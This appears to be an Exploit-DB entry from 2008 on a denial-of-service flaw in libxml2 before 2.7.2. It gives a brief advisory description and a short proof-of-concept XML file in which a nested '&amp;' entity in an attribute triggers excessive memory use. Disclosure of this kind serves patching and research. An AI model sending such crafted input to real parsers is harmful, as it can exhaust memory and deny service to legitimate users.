libxml2 - Denial of Service

EDB-ID:

32454




Platform:

Unix

Date:

2008-10-02


source: https://www.securityfocus.com/bid/31555/info

The libxml2 library is prone to a denial-of-service vulnerability caused by an error when handling files using entities in entity definitions.

An attacker can exploit this issue to cause the library to consume an excessive amount of memory, denying service to legitimate users.

The issue affects libxml2 2.7 prior to 2.7.2. 

XML file:

<?xml version='1.0' ?>
<!DOCTYPE test [
<!ENTITY ampproblem '&amp;'>
]>
<t a="&ampproblem;">a</t>